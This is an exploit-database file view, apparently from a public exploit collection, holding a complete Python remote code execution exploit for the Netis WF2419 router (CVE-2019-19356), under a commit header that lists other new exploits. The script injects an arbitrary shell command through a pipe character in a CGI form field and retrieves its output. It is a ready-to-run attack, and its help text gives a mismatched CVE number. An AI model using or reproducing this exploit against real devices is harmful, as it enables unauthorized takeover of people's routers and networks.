afe5797b88
12 changes to exploits/shellcodes Cyberoam Authentication Client 2.1.2.7 - Buffer Overflow (SEH) Wing FTP Server 6.2.3 - Privilege Escalation Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution CA Unified Infrastructure Management Nimsoft 7.80 - Remote Buffer Overflow Joplin Desktop 1.0.184 - Cross-Site Scripting Netis WF2419 2.2.36123 - Remote Code Execution Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery (Add User) TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware) Wing FTP Server 6.2.5 - Privilege Escalation TP LINK TL-WR849N - Remote Code Execution Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload) Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)
65 lines
No EOL
2.3 KiB
Python
Executable file
65 lines
No EOL
2.3 KiB
Python
Executable file
# Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution
|
|
# Exploit Author: Elias Issa
|
|
# Vendor Homepage: http://www.netis-systems.com
|
|
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75
|
|
# Date: 2020-02-11
|
|
# Version: WF2419 V2.2.36123 => V2.2.36123
|
|
# Tested on: NETIS WF2419 V2.2.36123 and V2.2.36123
|
|
# CVE : CVE-2019-19356
|
|
|
|
|
|
# Proof of Concept: python netis_rce.py http://192.168.1.1 "ls"
|
|
|
|
#!/usr/bin/env python
|
|
import argparse
|
|
import requests
|
|
import json
|
|
|
|
def exploit(host,cmd):
|
|
# Send Payload
|
|
headers_value={'User-Agent': 'Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0',
|
|
'Content-Type': 'application/x-www-form-urlencoded'}
|
|
post_data="mode_name=netcore_set&tools_type=2&tools_ip_url=|+"+cmd+"&tools_cmd=1&net_tools_set=1&wlan_idx_num=0"
|
|
vulnerable_page = host + "/cgi-bin-igd/netcore_set.cgi"
|
|
req_payload = requests.post(vulnerable_page, data=post_data, headers=headers_value)
|
|
print('[+] Payload sent')
|
|
try :
|
|
json_data = json.loads(req_payload.text)
|
|
if json_data[0] == "SUCCESS":
|
|
print('[+] Exploit Sucess')
|
|
# Get Command Result
|
|
print('[+] Getting Command Output\n')
|
|
result_page = host + "/cgi-bin-igd/netcore_get.cgi"
|
|
post_data = "mode_name=netcore_get&no=no"
|
|
req_result = requests.post(result_page, data=post_data, headers=headers_value)
|
|
json_data = json.loads(req_result.text)
|
|
results = json_data["tools_results"]
|
|
print results.replace(';', '\n')
|
|
else:
|
|
print('[-] Exploit Failed')
|
|
except:
|
|
print("[!] You might need to login.")
|
|
|
|
# To be implemented
|
|
def login(user, password):
|
|
print('To be implemented')
|
|
|
|
def main():
|
|
host = args.host
|
|
cmd = args.cmd
|
|
user = args.user
|
|
password = args.password
|
|
#login(user,password)
|
|
exploit(host,cmd)
|
|
|
|
if __name__ == "__main__":
|
|
ap = argparse.ArgumentParser(
|
|
description="Netis WF2419 Remote Code Execution Exploit (CVE-2019-1337) [TODO]")
|
|
ap.add_argument("host", help="URL (Example: http://192.168.1.1).")
|
|
ap.add_argument("cmd", help="Command to run.")
|
|
ap.add_argument("-u", "--user", help="Admin username (Default: admin).",
|
|
default="admin")
|
|
ap.add_argument("-p", "--password", help="Admin password (Default: admin).",
|
|
default="admin")
|
|
args = ap.parse_args()
|
|
main() |